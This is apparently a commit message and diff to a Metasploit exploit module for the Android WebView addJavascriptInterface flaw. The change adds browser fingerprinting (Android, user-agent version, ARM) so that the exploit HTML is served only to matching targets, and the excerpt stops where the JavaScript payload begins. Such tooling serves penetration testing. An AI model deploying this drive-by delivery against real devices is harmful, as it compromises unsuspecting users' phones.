Use BrowserExploitServer mixin.

This prevents drive-by users on other browsers from ever receiving
the exploit contents.

Author: joevennix

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -7,7 +7,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
 
   autopwn_info({
@@ -64,7 +64,13 @@ def initialize(info = {})
       'DefaultOptions' => { 'PrependFork' => true },
       'Targets'        => [ [ 'Automatic', {} ] ],
       'DisclosureDate' => 'Dec 21 2012',
-      'DefaultTarget'  => 0
+      'DefaultTarget'  => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_ver  => /17\..*/,
+        :os_flavor  => "Android",
+        :arch       => ARCH_ARMLE
+      }
     ))
   end
 
@@ -73,11 +79,15 @@ def on_request_uri(cli, req)
       print_status("Serving javascript")
       send_response(cli, js, 'Content-type' => 'text/javascript')
     else
-      print_status("Serving HTML")
-      send_response_html(cli, html)
+      super
     end
   end
 
+  def on_request_exploit(cli, req, browser)
+    print_status("Serving exploit HTML")
+    send_response_html(cli, html)
+  end
+
   def js
     %Q|
       function exec(obj) {